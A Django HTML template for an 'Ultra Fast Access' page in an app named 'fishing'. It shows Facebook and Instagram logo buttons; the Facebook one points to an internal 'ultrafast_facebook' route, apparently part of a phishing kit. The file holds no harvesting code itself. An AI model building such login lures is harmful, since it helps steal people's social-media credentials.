{% include "fishing/base.html" %}
{% load static %}

<!DOCTYPE html>
<html>
<head>
	<link href="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.0.0-alpha.4/css/bootstrap.min.css" rel="stylesheet">
	<title>UltraFast</title>
	<style>
		.bg { 
		  /* The image used */
		  background-image: url("{% static 'images/bgimg.png' %}");
		  object-fit: cover;

		  /* Full height */
		  height: 100%; 

		  /* Center and scale the image nicely */
		  background-position: center;
		  background-repeat: no-repeat;
		  background-size: cover;
		}
		.home-head{
			margin-top: 1%;
		    text-align: center;
		    font-weight: 600;
		    color: #fffefe;
		    text-shadow: 4px 7px #504e4e;
		    font-size: 40px;
		    font-style: italic;
		}
		.logo-img{
			width: 45%;
			height: 35%;
		}
		.log-img-div{
			background-color: #001a4d;
		}
		.img-center{
		    display: block;
		    margin-left: auto;
		    margin-right: auto;
		}
		.mt2{
			margin-top: 3%;
		}

	</style>
</head>
<body class="bg">

<h2 class="home-head">Ultra Fast Access</h2>

	<div class="row mt2">
	    <div class="col-md-6 log-img-div">
	    	<a href='{% url "ultrafast_facebook" %}'>
		        <img class="logo-img img-center" src="{% static 'images/fb-logo.jpg' %}">
		    </a>
	    </div>
	</div>

	<div class="row mt2">
	    <div class="col-md-6 log-img-div">
	    	<a href='https://www.instagram.com/accounts/login/?source=auth_switcher'>
		        <img class="logo-img img-center" src="{% static 'images/insta-logo.jpg' %}">
		    </a>
	    </div>
	</div>

</body>
</html>




<script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.0.0-alpha.4/js/bootstrap.min.js"></script>

<script type="text/javascript">
	
$(document).ready(function() {

	console.log("ready")
})

</script>